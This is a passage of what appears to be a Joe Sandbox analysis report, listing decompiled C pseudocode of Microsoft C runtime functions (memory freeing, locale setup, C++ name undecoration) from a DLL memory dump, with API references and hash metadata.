													_t389 =  *_t498;
													__eflags = _t349;
													if(_t349 != 0) {
														_t350 = E100272AB(_t389, _t349,  &(_v616.cAlternateFileName));
														_t523 = _t523 + 0xc;
														_v24 = _t350;
														_t503 = _t350;
													} else {
														_t351 =  &(_v616.cAlternateFileName);
														_push(_t351);
														_push(_t478);
														_push(_t478);
														_push(_t389);
														L79();
														_t503 = _t351;
														_t523 = _t523 + 0x10;
														_v24 = _t503;
													}
													__eflags = _t503;
													if(_t503 != 0) {
														break;
													}
													_t498 = _v28 + 4;
													_v28 = _t498;
													_t247 =  *_t498;
													__eflags = _t247;
													if(_t247 != 0) {
														continue;
													} else {
														_t366 = _v616.cAlternateFileName;
														_t388 = _v48;
														goto L42;
													}
													goto L127;
												}
												_t366 = _v616.cAlternateFileName;
												L59:
												_t461 = _t366;
												_v40 = _t461;
												__eflags = _v48 - _t461;
												asm("sbb ecx, ecx");
												_t391 =  !_t389 & _v48 - _t461 + 0x00000003 >> 0x00000002;
												__eflags = _t391;
												_v20 = _t391;
												if(_t391 != 0) {
													_t505 = _t391;
													do {
														E100268B3( *_t366);
														_t478 = _t478 + 1;
														_t366 = _t366 + 4;
														__eflags = _t478 - _t505;
													} while (_t478 != _t505);
													_t366 = _v616.cAlternateFileName;
													_t503 = _v24;
												}
												E100268B3(_t366);
												goto L64;
											}
										} else {
											_t352 = E1002449E(__eflags);
											_t503 = 0x16;
											 *_t352 = _t503;
											E1000E314();
											L64:
											__eflags = _v12 ^ _t516;
											return E100037EA(_t503, _v12 ^ _t516, _t461);
										}
									} else {
										goto L23;
									}
									goto L127;
									L23:
									_t354 = _v12;
									_t448 = _v16;
									 *((intOrPtr*)(_v32 + _t354)) = _t448;
									_t225 = _t354 + 4;
									_t382 = _t448 + _v20;
									_v16 = _t448 + _v20;
									_v12 = _t225;
									__eflags = _t225 - _v40;
								} while (_t225 != _v40);
								goto L24;
							}
						} else {
							_t495 = _t494 | 0xffffffff;
							_v12 = _t495;
							L25:
							E100268B3(_t364);
							_pop(_t383);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t364;
							_t359 = E100315D0(_t217,  &_v8);
							_t383 =  *_t490;
							__eflags = _t359;
							if(_t359 != 0) {
								_push( &_v44);
								_push(_t359);
								_push(_t383);
								L92();
								_t521 = _t521 + 0xc;
								_v12 = _t359;
								_t495 = _t359;
							} else {
								_t360 =  &_v44;
								_push(_t360);
								_push(_t364);
								_push(_t364);
								_push(_t383);
								L66();
								_t495 = _t360;
								_t521 = _t521 + 0x10;
								_v12 = _t495;
							}
							__eflags = _t495;
							if(_t495 != 0) {
								break;
							}
							_t490 = _a4 + 4;
							_a4 = _t490;
							_t217 =  *_t490;
							__eflags = _t217;
							if(_t217 != 0) {
								continue;
							} else {
								_t476 = _v44;
								_t381 = _v40;
								goto L9;
							}
							goto L127;
						}
						_t476 = _v44;
						L26:
						_t457 = _t476;
						_v32 = _t457;
						__eflags = _v40 - _t457;
						asm("sbb ecx, ecx");
						_t385 =  !_t383 & _v40 - _t457 + 0x00000003 >> 0x00000002;
						__eflags = _t385;
						_v28 = _t385;
						if(_t385 != 0) {
							_t497 = _t385;
							do {
								E100268B3( *_t476);
								_t364 = _t364 + 1;
								_t476 = _t476 + 4;
								__eflags = _t364 - _t497;
							} while (_t364 != _t497);
							_t476 = _v44;
							_t495 = _v12;
						}
						E100268B3(_t476);
						goto L31;
					}
				} else {
					_t361 = E1002449E(_t532);
					_t495 = 0x16;
					 *_t361 = _t495;
					E1000E314();
					L31:
					return _t495;
				}
				L127:
			}

APIs

_free.LIBCMT ref: 10026C72

Strings

*?, xrefs: 10026B1B

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: c56d30aa011644074e53267160d15b05e436b7d09828aa63056be6a414574a16
Instruction ID: 847a7b85ac657849b28afe8b1ecbe38e924a00e319cb61a108d93b801de08f7f
Opcode Fuzzy Hash: c56d30aa011644074e53267160d15b05e436b7d09828aa63056be6a414574a16
Instruction Fuzzy Hash: 4AE15B75E0021A9FCB14CFA8D8819EEFBF5EF4C350B65816AE815E7340E771AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 10025C61, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 276
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10025C61(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed short _v772;
				void* __ebp;
				signed int _t152;
				void* _t159;
				signed int _t160;
				signed int _t162;
				signed int _t163;
				intOrPtr _t164;
				signed int _t167;
				signed int _t169;
				intOrPtr _t170;
				signed int _t173;
				signed int _t175;
				void* _t176;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t212;
				signed int _t220;
				intOrPtr* _t221;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int _t240;
				signed int _t241;
				intOrPtr _t246;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int* _t258;
				short _t259;
				signed int _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_t244 = __edx;
				_t152 =  *0x1004d054; // 0xda1f8931
				_v8 = _t152 ^ _t260;
				_push(__ebx);
				_t212 = _a8;
				_push(__edi);
				_t246 = _a4;
				_v736 = _t212;
				_v732 = E10023FB6(__ecx, __edx) + 0x278;
				_t159 = E100250E8(__edx, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t263 = _t262 + 0x18;
				if(_t159 == 0) {
					L39:
					_t160 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t212 + 2; // 0x2
					_t252 = _t10 << 4;
					_t162 =  &_v272;
					_v712 = _t252;
					_t244 =  *(_t252 + _t246);
					_t220 = _t244;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t254 = _v712;
						if( *_t162 !=  *_t220) {
							break;
						}
						if( *_t162 == 0) {
							L6:
							_t163 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t162 + 2));
							_v706 = _t259;
							_t254 = _v712;
							if(_t259 !=  *((intOrPtr*)(_t220 + 2))) {
								break;
							} else {
								_t162 = _t162 + 4;
								_t220 = _t220 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t163 != 0) {
							_t221 =  &_v272;
							_t244 = _t221 + 2;
							do {
								_t164 =  *_t221;
								_t221 = _t221 + 2;
								__eflags = _t164 - _v704;
							} while (_t164 != _v704);
							_v708 = (_t221 - _t244 >> 1) + 1;
							_t167 = E10024214(4 + ((_t221 - _t244 >> 1) + 1) * 2);
							_v724 = _t167;
							__eflags = _t167;
							if(_t167 == 0) {
								goto L39;
							} else {
								_v720 =  *((intOrPtr*)(_t254 + _t246));
								_v740 =  *(_t246 + 0xa0 + _t212 * 4);
								_v744 =  *(_t246 + 8);
								_v728 = _t167 + 4;
								_t169 = E10028A30(_t167 + 4, _v708,  &_v272);
								_t264 = _t263 + 0xc;
								__eflags = _t169;
								if(_t169 != 0) {
									_t170 = _v728;
									_push(_t170);
									_push(_t170);
									_push(_t170);
									_push(_t170);
									_push(_t170);
									E1000E341();
									asm("int3");
									_push(_t260);
									_t173 = (_v772 & 0x0000ffff) - 0x2d;
									__eflags = _t173;
									if(_t173 == 0) {
										L51:
										__eflags = 0;
										return 0;
									} else {
										_t175 = _t173 - 1;
										__eflags = _t175;
										if(_t175 == 0) {
											_t176 = 2;
											return _t176;
										} else {
											__eflags = _t175 == 0x31;
											if(_t175 == 0x31) {
												goto L51;
											} else {
												__eflags = 1;
												return 1;
											}
										}
									}
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t254 + _t246)) = _v728;
									if(_v272 != 0x43) {
										L17:
										_t182 = E10024D73(_t212, _t246,  &_v700);
										_t244 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t244 = _v704;
											_t182 = _t244;
										}
									}
									 *(_t246 + 0xa0 + _t212 * 4) = _t182;
									__eflags = _t212 - 2;
									if(_t212 != 2) {
										__eflags = _t212 - 1;
										if(_t212 != 1) {
											__eflags = _t212 - 5;
											if(_t212 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v716;
										}
									} else {
										_t258 = _v732;
										 *(_t246 + 8) = _v716;
										_v708 = _t258[8];
										_t240 = _t258[9];
										_v716 = _t240;
										while(1) {
											__eflags =  *(_t246 + 8) -  *(_t258 + _t244 * 8);
											if( *(_t246 + 8) ==  *(_t258 + _t244 * 8)) {
												break;
											}
											_t210 =  *(_t258 + _t244 * 8);
											_t240 =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _v716;
											_t244 = _t244 + 1;
											_t212 = _v736;
											_v708 = _t210;
											_v716 = _t240;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t202 = E1002E537(_t244, __eflags, _v704, 1, 0x10044cf0, 0x7f,  &_v528,  *(_t246 + 8), 1);
												_t264 = _t264 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t241 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t260 + _t204 * 2 - 0x20c) =  *(_t260 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E1003FDBF( &_v528,  *0x1004d0b4, 0xfe);
													_t264 = _t264 + 0xc;
													__eflags = _t206;
													_t241 = 0 | _t206 == 0x00000000;
												}
												_t258[1] = _t241;
												 *_t258 =  *(_t246 + 8);
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L37;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _t240;
										}
										goto L25;
									}
									L37:
									_t183 = _t212 * 0xc;
									_t111 = _t183 + 0x10044d78; // 0x100245b6
									 *0x1004223c(_t246);
									_t185 =  *((intOrPtr*)( *_t111))();
									_t232 = _v720;
									__eflags = _t185;
									if(_t185 == 0) {
										__eflags = _t232 - 0x1004d178;
										if(_t232 == 0x1004d178) {
											L44:
											_t186 = _v712;
										} else {
											_t257 = _t212 + _t212;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L44;
											} else {
												E100268B3( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
												E100268B3( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
												E100268B3( *(_t246 + 0xa0 + _t212 * 4));
												_t186 = _v712;
												_t235 = _v704;
												 *(_t186 + _t246) = _t235;
												 *(_t246 + 0xa0 + _t212 * 4) = _t235;
											}
										}
										_t233 = _v724;
										 *_t233 = 1;
										_t160 =  *(_t186 + _t246);
										 *((intOrPtr*)(_t246 + 0x28 + (_t212 + _t212) * 8)) = _t233;
									} else {
										 *((intOrPtr*)(_v712 + _t246)) = _t232;
										E100268B3( *(_t246 + 0xa0 + _t212 * 4));
										 *(_t246 + 0xa0 + _t212 * 4) = _v740;
										E100268B3(_v724);
										 *(_t246 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t160 = _t244;
							L40:
							return E100037EA(_t160, _v8 ^ _t260, _t244);
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t163 = _t162 | 0x00000001;
					__eflags = _t163;
					goto L8;
				}
				L52:
			}

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,70D9FFF6,?,1000F7D4,70D9FFF6,?,00000000,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10024059

_free.LIBCMT ref: 10025F4C
_free.LIBCMT ref: 10025F65
_free.LIBCMT ref: 10025FA3
_free.LIBCMT ref: 10025FAC
_free.LIBCMT ref: 10025FB8

Strings

C, xrefs: 10025DBD

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 9dc0fb1ca5f463f5db6b5af44ed4f027f2feaede1bd810cdfab43a669e4722c1
Instruction ID: f4aafdac77f09b8263a2eb5dd3b4e6a66393a76b9c0d6fd7f3033f3f19c4753f
Opcode Fuzzy Hash: 9dc0fb1ca5f463f5db6b5af44ed4f027f2feaede1bd810cdfab43a669e4722c1
Instruction Fuzzy Hash: 43B17D7590121A9FDB64DF18D988AADB3F4FF08345F9145AAE80AA7350D731AE90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10008AEA, Relevance: 10.7, APIs: 7, Instructions: 151
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E10008AEA(void* __ebx, intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				char _v28;
				char _v36;
				char _v44;
				char* _t50;
				void* _t54;
				intOrPtr* _t57;
				void* _t62;
				intOrPtr* _t68;
				intOrPtr* _t69;
				char* _t73;
				void* _t77;
				void* _t78;
				intOrPtr* _t83;
				char* _t88;
				intOrPtr* _t104;
				void* _t108;
				void* _t113;
				char _t115;
				void* _t118;
				void* _t119;
				void* _t123;

				_t50 =  *0x1004e004; // 0x0
				_t119 = _t118 - 0x28;
				if( *_t50 == 0) {
					_t51 = _a8;
					_t115 = 0;
					if( *_a8 == 0) {
						goto L16;
					} else {
						_v28 = ")[";
						_v24 = 2;
						_t54 = E1000770C(E10007684(E10007637(_t85,  &_v44, 0x28, _t51),  &_v36,  &_v28),  &_v20, 1);
						_t88 =  &_v12;
						goto L17;
					}
					L21:
				} else {
					_t113 = E1000AAAD();
					_t123 = _t113;
					if(_t123 < 0 || _t123 == 0) {
						_t115 = 0;
						L16:
						_v12 = _t115;
						_v8 = _t115;
						E10008798( &_v12, 0x5b);
						_t54 = E1000770C( &_v12,  &_v44, 1);
						_t88 =  &_v36;
						L17:
						E10008D42(_a4, E100076C8(_t54, _t88, 0x5d));
						_t57 = _a4;
					} else {
						_t83 = _a8;
						_v12 = 0;
						_v8 = 0;
						if(( *(_t83 + 4) & 0x00000800) == 0) {
							L5:
							_t62 = _t113;
							_t113 = _t113 - 1;
							if(_t62 != 0) {
								_t73 =  *0x1004e004; // 0x0
								if( *_t73 != 0) {
									_t77 = E10007637(_t85,  &_v36, 0x5b, E10009E08(_t108,  &_v20, 0));
									_t119 = _t119 + 0x14;
									_t78 = E100076C8(_t77,  &_v44, 0x5d);
									_t85 =  &_v12;
									E100077A0( &_v12, _t78);
									goto L8;
								}
							}
						} else {
							_v20 = 0x10042dd4;
							_t85 =  &_v12;
							_v16 = 2;
							E10007748( &_v12,  &_v20);
							L8:
							if(_v8 <= 1) {
								goto L5;
							}
						}
						if( *_t83 != 0) {
							if(( *(_t83 + 4) & 0x00000800) == 0) {
								_t68 = E100076C8(E10007637(_t85,  &_v44, 0x28, _t83),  &_v36, 0x29);
								_push( &_v12);
								_push( &_v20);
								_t104 = _t68;
							} else {
								_t104 = _t83;
								_push( &_v12);
								_push( &_v44);
							}
							_t69 = E100076A6(_t104);
							_v12 =  *_t69;
							_v8 =  *((intOrPtr*)(_t69 + 4));
						}
						E1000B1EA(_t83,  &_v28,  &_v12);
						_t57 = _a4;
						 *_t57 = _v28;
						 *(_t57 + 4) = _v24 | 0x00000800;
					}
				}
				return _t57;
				goto L21;
			}

APIs

DName::operator+.LIBCMT ref: 10008B78
DName::operator+.LIBCMT ref: 10008BCB

Part of subcall function 10007748: shared_ptr.LIBCMT ref: 10007764

Part of subcall function 10007637: DName::operator+.LIBCMT ref: 10007658

DName::operator+.LIBCMT ref: 10008BBC
DName::operator+.LIBCMT ref: 10008C1C
DName::operator+.LIBCMT ref: 10008C29
DName::operator+.LIBCMT ref: 10008C70
DName::operator+.LIBCMT ref: 10008C7D

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: c8cb4e4b3be6c4ee29983329df1be7be1792c1402584c21628f1be7317d469b5
Instruction ID: 0dbcc1bb4ee46c20ec2d03185912c156ee3fc1c0119f9f9dc31a411e659c0aa6
Opcode Fuzzy Hash: c8cb4e4b3be6c4ee29983329df1be7be1792c1402584c21628f1be7317d469b5
Instruction Fuzzy Hash: 775186B5D04218AFEB05CB94C895EEEBBF8FF08390F044159F546A7185DB75AB44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10009E08, Relevance: 10.6, APIs: 7, Instructions: 102
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 42%

			E10009E08(void* __edx, intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _v40;
				char _v44;
				void* __ebx;
				intOrPtr _t24;
				char* _t27;
				intOrPtr* _t28;
				intOrPtr* _t29;
				void* _t30;
				intOrPtr _t33;
				char _t38;
				intOrPtr* _t40;
				char _t42;
				char* _t45;
				char* _t46;
				void* _t55;
				intOrPtr* _t56;

				_t55 = __edx;
				_t40 =  *0x1004e004; // 0x0
				_t38 = 0;
				if( *_t40 == 0x51) {
					_t38 = 1;
					_t40 = _t40 + 1;
					 *0x1004e004 = _t40;
				}
				_t24 =  *_t40;
				if(_t24 != 0) {
					if(_t24 < 0x30 || _t24 > 0x39) {
						E1000CBF0(_t40,  &_v44);
						if(_v36 == 0) {
							_t27 =  *0x1004e004; // 0x0
							if( *_t27 != 0) {
								_t42 = 0;
								_v8 = 2;
								_v12 = 0;
								_t56 =  &_v12;
							} else {
								_t29 = E100072DE( &_v36, 1);
								goto L22;
							}
						} else {
							_push(_v40);
							 *0x1004e004 =  *0x1004e004 + 1;
							_push(_v44);
							if(_a8 == 0) {
								if(_t38 == 0) {
									_t45 =  &_v20;
									goto L11;
								} else {
									_t46 =  &_v36;
									goto L8;
								}
							} else {
								if(_t38 == 0) {
									_t29 = E10007328(_t38,  &_v20);
									goto L22;
								} else {
									_t30 = E10007328(_t38,  &_v36);
									goto L9;
								}
							}
							goto L23;
						}
					} else {
						_t33 = _t24;
						if(_t38 == 0) {
							asm("cdq");
							asm("adc edx, 0xffffffff");
							_push(_t55);
							 *0x1004e004 = _t40 + 1;
							_t45 =  &_v36;
							_push(_t33 + 0xffffffd1);
							L11:
							_t29 = E100073B4(_t45);
							L22:
							_t56 = _t29;
						} else {
							asm("cdq");
							_push(_t55);
							 *0x1004e004 = _t40 + 1;
							_t46 =  &_v20;
							_push(_t33 - 0x2f);
							L8:
							_t30 = E100073B4(_t46);
							L9:
							E100076A6(E1000723E( &_v28, 0x1004d070),  &_v12, _t30);
							_t56 =  &_v12;
						}
						L23:
						_t42 =  *_t56;
					}
					_t28 = _a4;
					 *_t28 = _t42;
					_t22 = _t56 + 4; // 0x40001004
					 *((intOrPtr*)(_t28 + 4)) =  *_t22;
				} else {
					E100072DE(_a4, 1);
					_t28 = _a4;
				}
				return _t28;
			}

APIs

DName::DName.LIBVCRUNTIME ref: 10009E30
DName::DName.LIBVCRUNTIME ref: 10009E5D

Part of subcall function 100073B4: __aulldvrm.LIBCMT ref: 100073E5

DName::operator+.LIBCMT ref: 10009E78
DName::DName.LIBVCRUNTIME ref: 10009E95
DName::DName.LIBVCRUNTIME ref: 10009EC5
DName::DName.LIBVCRUNTIME ref: 10009ECF
DName::DName.LIBVCRUNTIME ref: 10009EF6

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: NameName::$Name::operator+__aulldvrm
String ID:
API String ID: 4069495278-0
Opcode ID: c2653dc1151c0b8f23c99d4576837361905e921933427748eb52f378f376a92a
Instruction ID: 0ead771c213622766d894edfd69fa415a0cbe9b7da6d14d4204ba7d65ba76e3a
Opcode Fuzzy Hash: c2653dc1151c0b8f23c99d4576837361905e921933427748eb52f378f376a92a
Instruction Fuzzy Hash: E731F471D042849AFF08CFA4CD91BED7BB5FF09380F104059E959A729ADB746D85CB14

Uniqueness

Uniqueness Score: -1.00%

Function 1000A460, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E1000A460(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				long _v76;
				char _v80;
				long long _v84;
				char _v92;
				char _v96;
				void* _v100;
				void* __ebp;
				signed int _t24;
				intOrPtr _t26;
				char* _t29;
				intOrPtr* _t30;
				intOrPtr* _t44;
				void* _t45;
				long long _t46;
				intOrPtr* _t55;
				signed int _t56;
				long long* _t57;
				long long _t61;

				_t54 = __edx;
				_t24 =  *0x1004d054; // 0xda1f8931
				_v8 = _t24 ^ _t56;
				_t44 =  *0x1004e004; // 0x0
				_t55 = _a4;
				_t26 =  *_t44;
				if(_t26 != 0) {
					if(_t26 < 0x30 || _t26 > 0x39) {
						E1000CBF0(_t44,  &_v100);
						_pop(_t45);
						if(_v92 == 0) {
							L11:
							_t29 =  *0x1004e004; // 0x0
							if( *_t29 != 0) {
								_t46 = 0;
								_v80 = 2;
								_v84 = 0;
								_t30 =  &_v84;
							} else {
								_t30 = E100072DE( &_v84, 1);
								_t46 =  *_t30;
							}
							 *_t55 = _t46;
							 *((intOrPtr*)(_t55 + 4)) =  *((intOrPtr*)(_t30 + 4));
						} else {
							_v84 = _v100;
							_v80 = _v96;
							if(_a8 != 0x42) {
								if(_a8 != 0x41) {
									goto L11;
								} else {
									_t61 = _v84;
									goto L8;
								}
							} else {
								_t61 = _v84;
								L8:
								 *_t57 = _t61;
								swprintf( &_v76, 0x41, "%lf", _t45, _t45);
								_v80 = 0;
								_push(_v80);
								E10006DC1(_t55,  &_v76);
							}
						}
					} else {
						asm("cdq");
						 *0x1004e004 = _t44 + 1;
						E100073B4(_t55, _t26 - 0x2f, __edx);
					}
				} else {
					E100072DE(_t55, 1);
				}
				return E100037EA(_t55, _v8 ^ _t56, _t54);
			}

APIs

DName::DName.LIBVCRUNTIME ref: 1000A484
DName::DName.LIBVCRUNTIME ref: 1000A4A8

Strings

A, xrefs: 1000A503
%lf, xrefs: 1000A4DC

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: NameName::
String ID: %lf$A
API String ID: 1333004437-43661536
Opcode ID: 09a75fdd47e4acb5447cdab9d691237d5dc8450d4975c5c861bb3ef48e028a29
Instruction ID: 1a9286bd75de71b3adf91c9212a77dd4288feb1749d5defe6a7f402daddab9a2
Opcode Fuzzy Hash: 09a75fdd47e4acb5447cdab9d691237d5dc8450d4975c5c861bb3ef48e028a29
Instruction Fuzzy Hash: 7E31CEB5E042589BEF24CFA4DD45ADDBBB4FF0A380F10415EE8459B249C7B4A981CB05

Uniqueness

Uniqueness Score: -1.00%

Function 1002F7C8, Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002F7C8(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E1002F497(_t45, 7);
					E1002F497(_t45 + 0x1c, 7);
					E1002F497(_t45 + 0x38, 0xc);
					E1002F497(_t45 + 0x68, 0xc);
					E1002F497(_t45 + 0x98, 2);
					E100268B3( *((intOrPtr*)(_t45 + 0xa0)));
					E100268B3( *((intOrPtr*)(_t45 + 0xa4)));
					E100268B3( *((intOrPtr*)(_t45 + 0xa8)));
					E1002F497(_t45 + 0xb4, 7);
					E1002F497(_t45 + 0xd0, 7);
					E1002F497(_t45 + 0xec, 0xc);
					E1002F497(_t45 + 0x11c, 0xc);
					E1002F497(_t45 + 0x14c, 2);
					E100268B3( *((intOrPtr*)(_t45 + 0x154)));
					E100268B3( *((intOrPtr*)(_t45 + 0x158)));
					E100268B3( *((intOrPtr*)(_t45 + 0x15c)));
					return E100268B3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

APIs

Part of subcall function 1002F497: _free.LIBCMT ref: 1002F4BC

_free.LIBCMT ref: 1002F816

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 1002F821
_free.LIBCMT ref: 1002F82C
_free.LIBCMT ref: 1002F880
_free.LIBCMT ref: 1002F88B
_free.LIBCMT ref: 1002F896
_free.LIBCMT ref: 1002F8A1

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b6a4d705080cccdd2f01c69a37c813b959a5eb3b3a4044ec5a65d09ed6793608
Instruction ID: de5a865e1f82c24ee5e8fa7fff2b21cb884519308ee5bc5c1053497f94fa0323
Opcode Fuzzy Hash: b6a4d705080cccdd2f01c69a37c813b959a5eb3b3a4044ec5a65d09ed6793608
Instruction Fuzzy Hash: F511DA75640B08AAE620EBF0ED47FEB7B9CEF04740F804D3DB699A6152DBA9B5048750

Uniqueness

Uniqueness Score: -1.00%

Function 1000337C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E1000337C(intOrPtr _a4) {
				char _v16;
				intOrPtr _v24;
				char _v44;
				intOrPtr _v52;
				char _v72;
				intOrPtr _v80;
				char _v104;
				intOrPtr _v112;
				char _v132;
				void* _t43;
				void* _t44;
				void* _t45;

				_t44 = _t43 - 0xc;
				E10002F08( &_v16, _a4);
				E10004C0B( &_v16, 0x1004ad80);
				asm("int3");
				_push(_t43);
				_t45 = _t44 - 0xc;
				E10002F7C( &_v44, _v24);
				E10004C0B( &_v44, 0x1004adbc);
				asm("int3");
				_push(_t44);
				E10002FB6( &_v72, _v52);
				E10004C0B( &_v72, 0x1004adf8);
				asm("int3");
				_push(_t45);
